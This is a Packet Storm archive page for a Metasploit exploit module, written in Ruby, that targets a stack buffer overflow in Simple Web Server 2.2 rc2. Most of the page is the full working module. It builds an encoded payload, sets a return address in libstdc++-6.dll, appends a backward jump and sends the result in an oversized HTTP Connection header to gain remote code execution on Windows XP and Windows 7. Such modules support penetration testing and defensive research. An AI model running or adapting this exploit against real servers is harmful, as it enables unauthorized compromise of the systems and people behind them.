what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Simple Web Server Connection Header Buffer Overflow

Simple Web Server Connection Header Buffer Overflow
Posted Jul 23, 2012
Authored by mr.pr0n, juan | Site metasploit.com

This Metasploit module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string data in the Connection Header to cause an overflow on the stack when function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3.

tags | exploit, remote, web, overflow, arbitrary, code execution
systems | windows
SHA-256 | ef2c81d5811597767d04bfb232a9ea85a237262aae453dc634269ab733bcb34c

Simple Web Server Connection Header Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => "Simple Web Server Connection Header Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user
can send a long string data in the Connection Header to causes an overflow on the
stack when function vsprintf() is used, and gain arbitrary code execution. The
module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr.pr0n', # Vulnerability Discovery and PoC
'juan' # Metasploit module
],
'References' =>
[
['EDB', '19937'],
['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
'Space' => 2048,
'DisableNops' => true,
'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000
},
'DefaultOptions' =>
{
'EXITFUNC' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[
'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll
'Offset' => 2048,
'OffsetEDI' => 84
}
]
],
'Privileged' => false,
'DisclosureDate' => "Jul 20 2012",
'DefaultTarget' => 0))
end

def check
res = send_request_raw({'uri'=>'/'})
if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end

def exploit

sploit = payload.encoded
sploit << rand_text(target['Offset'] - sploit.length)
sploit << [target.ret].pack("V") # eip
sploit << rand_text(target['OffsetEDI'])
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string

print_status("Trying target #{target.name}...")

connect

send_request_cgi({
'uri' => '/',
'version' => '1.1',
'method' => 'GET',
'connection' => sploit
})

disconnect

end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close